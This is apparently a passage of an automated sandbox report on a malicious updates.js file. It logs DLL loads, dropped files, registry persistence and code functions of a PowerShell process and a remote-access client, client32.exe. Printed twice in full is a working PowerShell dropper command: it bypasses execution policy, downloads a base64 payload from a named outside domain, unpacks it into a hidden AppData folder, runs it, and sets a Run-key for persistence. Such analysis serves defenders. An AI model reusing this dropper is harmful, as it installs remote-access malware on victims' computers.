                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\QCHBWPB-9\NSM.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: updates.jsStatic file information: File size 7684589 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe

                                Data Obfuscation

                                barindex
                                Found suspicious powershell code related to unpacking or dynamic code loading
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-It
                                Suspicious powershell command line found
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: PCICL32.DLL.2.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F07567 push ebx; iretd 2_2_00007FF848F0756A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1116FF15 push ecx; ret 4_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1116AE09 push ecx; ret 4_2_1116AE1C
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF26BBF push ecx; ret 4_2_6EF26BD2
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1116FF15 push ecx; ret 6_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1116AE09 push ecx; ret 6_2_1116AE1C
                                Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF07030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,4_2_6EF07030
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BTGEEENAJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BTGEEENAJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113380 IsIconic,GetTickCount,4_2_11113380
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024880
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11113380 IsIconic,GetTickCount,6_2_11113380
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11113FA0
